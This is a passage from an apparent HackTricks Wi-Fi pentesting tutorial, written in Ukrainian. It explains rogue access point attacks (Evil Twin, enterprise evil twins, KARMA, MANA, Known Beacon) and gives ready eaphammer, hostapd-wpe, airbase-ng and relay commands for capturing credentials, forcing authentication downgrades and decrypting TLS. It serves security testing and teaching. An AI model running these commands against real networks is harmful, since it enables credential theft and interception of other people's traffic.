airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf
Переспрямування та перенаправлення
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
Evil Twin
Атака Evil Twin використовує те, як WiFi-клієнти розпізнають мережі, покладаючись насамперед на ім’я мережі (ESSID) і не вимагаючи, щоб базова станція (access point) автентифікувалася перед клієнтом. Ключові моменти:
- Складність розрізнення: Пристрої важко відрізнити легітимні та rogue access point, коли вони мають однаковий ESSID та тип шифрування. У реальних мережах часто використовують кілька access point з однаковим ESSID для безшовного розширення покриття.
- Роумінг клієнта та маніпуляція підключенням: Протокол 802.11 дозволяє пристроям переміщатися між access point в рамках того самого ESS. Зловмисники можуть експлуатувати це, заманюючи пристрій відключитися від поточної базової станції та підключитися до rogue access point. Це можна досягти, запропонувавши сильніший сигнал або порушивши з’єднання з легітимним access point за допомогою, наприклад, deauthentication packets або jamming.
- Складнощі виконання: Успішне виконання evil twin attack у середовищах з кількома добре розташованими access point може бути складним. Deauthenticating одного легітимного access point часто призводить до того, що пристрій підключається до іншого легітимного access point, якщо зловмисник не може deauthenticate всі навколишні access point або стратегічно розмістити rogue access point.
Ви можете створити дуже простий Open Evil Twin (без можливості маршрутизувати трафік в Internet), зробивши:
airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon
Ви також можете створити Evil Twin, використовуючи eaphammer (зверніть увагу, що для створення evil twins за допомогою eaphammer interface не повинен бути у monitor режимі):
./eaphammer -i wlan0 --essid exampleCorp --captive-portal
Або використовуючи Airgeddon: Options: 5,6,7,8,9 (inside Evil Twin attack menu).
.png)
Зверніть увагу, що за замовчуванням, якщо ESSID у PNL збережено як WPA-захищений, пристрій не підключиться автоматично до Open Evil Twin. Ви можете спробувати DoS справжній AP і сподіватися, що користувач вручну підключиться до вашого Open Evil Twin, або ви можете DoS справжній AP і використати WPA Evil Twin, щоб перехопити handshake (за допомогою цього методу ви не зможете дозволити жертві підключитися до вас, оскільки ви не знаєте PSK, але ви зможете перехопити handshake і спробувати його зламати).
Деякі OS і AV попереджуватимуть користувача, що підключення до Open мережі небезпечне…
WPA/WPA2 Evil Twin
Ви можете створити Evil Twin using WPA/2 і якщо пристрої налаштовані підключатися до цього SSID з WPA/2, вони спробують підключитися. У будь-якому разі, to complete the 4-way-handshake вам також потрібно знати пароль, який клієнт збирається використовувати. Якщо ви не знаєте його, з’єднання не буде завершено.
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
Enterprise Evil Twin
Щоб зрозуміти ці атаки, рекомендую перед цим прочитати коротке WPA Enterprise explanation.
Використання hostapd-wpe
hostapd-wpe для роботи потребує файлу конфігурації. Щоб автоматизувати генерацію цих конфігурацій, ви можете використати https://github.com/WJDigby/apd_launchpad (завантажте python-файл у папку /etc/hostapd-wpe/)
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s
У конфігураційному файлі ви можете вибрати багато різних речей, таких як ssid, channel, user files, cret/key, dh parameters, wpa version and auth…
Using hostapd-wpe with EAP-TLS to allow any certificate to login.
Використання EAPHammer
# Generate Certificates
./eaphammer --cert-wizard
# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
За замовчуванням EAPHammer застосовує такі методи автентифікації (зауважте GTC першим — щоб спробувати отримати plaintext passwords — після чого використовуються більш надійні auth methods):
GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
Це методологія за замовчуванням, щоб уникнути довгого часу підключення. Однак ви також можете вказати серверу методи автентифікації від найслабших до найсильніших:
--negotiate weakest
Or you could also use:
--negotiate gtc-downgradeщоб використати високоефективну реалізацію GTC downgrade (паролі у відкритому тексті)--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAPщоб вручну вказати запропоновані методи (якщо запропонувати ті самі auth methods у тому самому порядку, що й у організації, атаку буде набагато складніше виявити).- Детальніше в wiki
When clients skip RADIUS certificate validation (PEAP/TTLS)
- Якщо пристрої налаштовані на “do not validate certificate”, клонований AP + rogue RADIUS (
eaphammer --cert-wizard --creds --auth wpa-eap) збирає NetNTLMv2 (PEAP-MSCHAPv2) або cleartext облікові дані (PEAP-GTC).bettercapdeauth (wifi.deauth <BSSID>) одночасно виявляє приховані SSID під час probe-запитів і примушує перепідключення, якщо тільки PMF/802.11w не блокує підроблені deauth. - Зламаний NetNTLMv2 дає багаторазово використовувані Wi‑Fi/AD облікові дані; GTC дає негайні облікові дані у відкритому вигляді.
Relaying PEAP-MSCHAPv2 instead of cracking (wpa_sycophant + hostapd-mana)
- Для облікових записів машин з незламними випадковими паролями зловживайте MSCHAPv2 relay: запустіть
hostapd-manaяк Evil Twin, пересилаючи MSCHAPv2 обмін доwpa_sycophant, який одночасно підключається до легітимного AP. Успішний relay надає автентифікований доступ до Wi‑Fi без відновлення пароля. - Використовуйте збірки, що підтримують цільовий рівень безпеки (WPA3/PMF вимагає сучасних hostapd/wpa_supplicant); PMF перешкоджає примусовому deauth, тому чекайте на добровільні асоціації клієнтів.
Using Airgeddon
Airgeddon може використовувати попередньо згенеровані сертифікати, щоб запропонувати EAP authentication для мереж WPA/WPA2-Enterprise. Фейкова мережа знизить протокол підключення до EAP-MD5, тож вона зможе capture the user and the MD5 of the password. Пізніше нападник може спробувати зламати пароль.Airggedon дає можливість виконувати continuous Evil Twin attack (noisy) або лише створити Evil Attack до підключення кого-небудь (smooth).
.png)
Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks
Цей метод протестовано на з’єднанні PEAP, але оскільки я дешифрую довільний TLS тунель, це має також працювати з EAP-TTLS
У конфігурації hostapd-wpe закоментуйте рядок, що містить dh_file (з dh_file=/etc/hostapd-wpe/certs/dh на #dh_file=/etc/hostapd-wpe/certs/dh)
Це змусить hostapd-wpe обмінювати ключі з використанням RSA замість DH, тож ви зможете пізніше дешифрувати трафік, знаючи приватний ключ сервера.
Тепер запустіть Evil Twin використовуючи hostapd-wpe з тією зміненою конфігурацією як зазвичай. Також запустіть wireshark на інтерфейсі, який виконує атаку Evil Twin.
Тепер або пізніше (коли ви вже захопили кілька спроб автентифікації) ви можете додати приватний RSA ключ у wireshark за адресою: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...
Додайте новий запис і заповніть форму цими значеннями: IP address = any – Port = 0 – Protocol = data – Key File (select your key file, щоб уникнути проблем виберіть файл ключа без захисту паролем).
.png)
І перегляньте нову вкладку “Decrypted TLS”:
.png)
KARMA, MANA, Loud MANA та Known beacons attack
ESSID and MAC black/whitelists
Різні типи Media Access Control Filter Lists (MFACLs) та їх відповідні режими й вплив на поведінку rogue Access Point (AP):
- MAC-based Whitelist:
- Rogue AP буде відповідати лише на probe requests від пристроїв, вказаних у whitelist, залишаючись невидимим для всіх інших, які не наведені у списку.
- MAC-based Blacklist:
- Rogue AP ігнорує probe requests від пристроїв у blacklist, ефективно роблячи rogue AP невидимим для цих конкретних пристроїв.
- SSID-based Whitelist:
- Rogue AP відповідатиме на probe requests лише для певних ESSID, зазначених у списку, роблячи його невидимим для пристроїв, чиї Preferred Network Lists (PNLs) не містять цих ESSID.
- SSID-based Blacklist:
- Rogue AP не відповідатиме на probe requests для конкретних ESSID у blacklist, роблячи його невидимим для пристроїв, які шукають саме ті мережі.
# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*
[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
# example ESSID-based MFACL file
name1
name2
name3
[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]
KARMA
Цей метод дозволяє зловмиснику створити шкідливу точку доступу (AP), яка відповідає на всі probe requests від пристроїв, що намагаються підключитися до мереж. Ця техніка обманює пристрої, змушуючи їх підключатися до AP зловмисника, імітуючи мережі, які шукає пристрій. Коли пристрій надсилає запит на підключення до такої підробленої точки доступу, підключення завершується, і пристрій помилково підключається до мережі зловмисника.
MANA
Згодом пристрої почали ігнорувати ненадійні відповіді мереж, що знизило ефективність оригінальної KARMA attack. Проте Ian de Villiers та Dominic White представили новий метод, відомий як MANA attack. Цей метод полягає в тому, що підроблена AP захоплює Preferred Network Lists (PNL) пристроїв, відповідаючи на їхні broadcast probe requests назвами мереж (SSIDs), які раніше збережені пристроями. Ця витончена атака обходить захисти проти початкової KARMA attack, експлуатуючи спосіб, у який пристрої запам’ятовують і надають пріоритет відомим мережам.
MANA attack працює шляхом моніторингу як directed, так і broadcast probe requests від пристроїв. Для directed запитів вона фіксує MAC address пристрою та запитувану назву мережі, додаючи цю інформацію до списку. Коли надходить broadcast запит, AP відповідає інформацією, що відповідає будь-якій мережі зі списку пристрою, підштовхуючи його підключитися до підробленої точки доступу.
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]
Loud MANA
A Loud MANA attack — це просунута стратегія, що застосовується, коли пристрої не використовують directed probing або коли їх Preferred Network Lists (PNL) невідомі атакуючому. Вона базується на принципі, що пристрої в одній зоні, ймовірно, мають спільні назви мереж у своїх PNLs. Замість вибіркової відповіді цей attack транслює probe responses для кожної назви мережі (ESSID), знайденої в об’єднаних PNLs усіх спостережуваних пристроїв. Такий широкий підхід підвищує ймовірність того, що пристрій впізнає знайому мережу і спробує підключитися до rogue Access Point (AP).
./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]
Known Beacon attack
Коли Loud MANA attack може бути недостатньою, Known Beacon attack пропонує інший підхід. Цей метод brute-forces процес підключення, імітуючи AP, який відповідає на будь-яку назву мережі, перебираючи список потенційних ESSIDs, отриманих із wordlist. Це імітує присутність численних мереж у спробі співпасти з ESSID у PNL жертви, змушуючи пристрій спробувати підключитися до підробленого AP. Атака може бути посилена поєднанням з опцією --loud для більш агресивної спроби заманити пристрої.
Eaphammer реалізував цю атаку як MANA attack, де всі ESSIDs у списку поширюються (ви також можете поєднати це з --loud, щоб створити Loud MANA + Known beacons attack):
./eaphammer -i wlan0 --mana [--loud] --known-beacons --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]
Known Beacon Burst attack
The Known Beacon Burst attack полягає в rapid-fire broadcasting of beacon frames for each ESSID listed in a file. Це створює щільне середовище підроблених мереж, що значно підвищує ймовірність підключення пристроїв до rogue AP, особливо в поєднанні з MANA attack. Ця техніка використовує швидкість і обсяг, щоб перевантажити механізми вибору мереж пристроїв.
# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5
Wi-Fi Direct
Wi-Fi Direct — протокол, який дозволяє пристроям з’єднуватися безпосередньо один з одним через Wi-Fi без потреби в традиційній точці доступу. Ця можливість вбудована в різні Internet of Things (IoT) пристрої, такі як принтери та телевізори, і полегшує пряме пристрій-до-пристрою спілкування. Важливою особливістю Wi-Fi Direct є те, що один пристрій приймає на себе роль точки доступу, відомої як group owner, для керування з’єднанням.
Забезпечення безпеки Wi-Fi Direct здійснюється через Wi-Fi Protected Setup (WPS), який підтримує кілька методів для безпечного спарювання, зокрема:
- Push-Button Configuration (PBC)
- PIN entry
- Near-Field Communication (NFC)
Ці методи, особливо PIN entry, піддаються тим самим вразливостям, що й WPS у традиційних Wi-Fi мережах, через що вони стають цілями для схожих векторів атак.
EvilDirect Hijacking
EvilDirect Hijacking — атака, специфічна для Wi-Fi Direct. Вона відтворює концепцію Evil Twin attack, але спрямована на Wi-Fi Direct з’єднання. У цьому сценарії зловмисник видає себе за легітимного group owner з метою обманути пристрої, щоб ті підключилися до шкідливого вузла. Цей метод можна реалізувати за допомогою інструментів на кшталт airbase-ng, вказавши канал, ESSID та MAC-адресу імітованого пристрою:
Посилання
- https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
- https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9
- https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38
- https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d
- https://github.com/gdssecurity/Whitepapers/blob/master/GDS%20Labs%20-%20Identifying%20Rogue%20Access%20Point%20Attacks%20Using%20Probe%20Response%20Patterns%20and%20Signal%20Strength.pdf
- http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/
- https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
- https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d
- https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
- https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
- The vulnerability that killed FreeWifi_Secure
- RFC 4186 – EAP-SIM Authentication
- 3GPP TS 33.402 – 3GPP system architecture evolution (SAE); Security aspects of non-3GPP accesses
- Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025 (Synacktiv)
- PEAP relay attacks with wpa_sycophant (SensePost)
TODO: Переглянути https://github.com/wifiphisher/wifiphisher (логін через Facebook та імітація WPA у captive portals)
Tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.


